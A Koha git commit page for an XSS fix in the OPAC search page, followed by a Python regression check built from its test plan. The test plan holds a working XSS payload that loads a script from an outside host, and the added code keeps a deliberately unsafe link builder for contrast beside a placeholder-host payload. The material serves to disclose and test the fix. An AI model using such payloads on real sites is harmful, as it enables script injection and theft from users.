git.koha-community.org Git - koha.git/commit
Bug 14418 XSS Vulnerabilities
author Chris Cormack <chrisc@catalyst.net.nz>
Thu, 18 Jun 2015 21:25:22 +0000 (09:25 +1200)
committer Mason James <mtj@kohaaloha.com>
Sun, 21 Jun 2015 17:37:57 +0000 (05:37 +1200)
commit 336264936a81a971dfb2fdc1a687d03b61a01a86
tree 79f126aa3201f4bfb039305ae4f78f81fd50e5b6
parent 4a414a044d1792baa6a588c275b7c74ad07833e4
Bug 14418 XSS Vulnerabilities

Fix for /cgi-bin/koha/opac-search.pl

To test

1/ Hit /cgi-bin/koha/opac-search.pl?tag="><script
src='http://cst.sba-research.org/x.js'/>&q=a
2/ Notice the js is executed
3/ Apply patch
4/ Reload page, notice it is no longer executed
5/ Test the rss links work still

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Confirmed bug and that the patch fixes it.
Signed-off-by: Mason James <mtj@kohaaloha.com>
koha-tmpl/opac-tmpl/bootstrap/en/modules/opac-results.tt
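
The test plan above (script no longer executes, RSS links still work) can be turned into an automated regression check. The following is an added example in Python, not Koha's Template Toolkit code and not the change made by this commit, which this page does not show. The link markup, the function names and the `attacker.invalid` host are assumptions made for illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote, urlsplit

# Constructed input shaped like the test plan's tag value (placeholder host).
PAYLOAD = "\"><script src='http://attacker.invalid/x.js'/>"
BASE = "/cgi-bin/koha/opac-search.pl"


def rss_link_unsafe(tag):
    """'Before' form: the raw parameter is interpolated into the attribute."""
    return '<a class="rss" href="%s?tag=%s&format=rss2">RSS</a>' % (BASE, tag)


def rss_link_safe(tag):
    """Percent-encode the value for the query string, then HTML-escape the
    finished URL for the attribute context it is written into."""
    url = "%s?tag=%s&format=rss2" % (BASE, quote(tag, safe=""))
    return '<a class="rss" href="%s">RSS</a>' % escape(url, quote=True)


class _Audit(HTMLParser):
    """Records every element the parser sees and every href value."""

    def __init__(self):
        super().__init__()
        self.tags, self.hrefs = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.hrefs += [value for name, value in attrs if name == "href"]


def audit(markup):
    """Parse rendered markup: did a <script> element appear, and does the
    link still carry the original tag value after decoding?"""
    parser = _Audit()
    parser.feed(markup)
    parser.close()
    values = [parse_qs(urlsplit(h).query).get("tag", [None])[0]
              for h in parser.hrefs]
    return {"script_injected": "script" in parser.tags, "tag_values": values}


if __name__ == "__main__":
    for render in (rss_link_unsafe, rss_link_safe):
        print(render.__name__, audit(render(PAYLOAD)))
```

The check parses the output instead of searching it for a substring, so it reports both failure modes: an injected element, and a link whose `tag` value no longer round-trips.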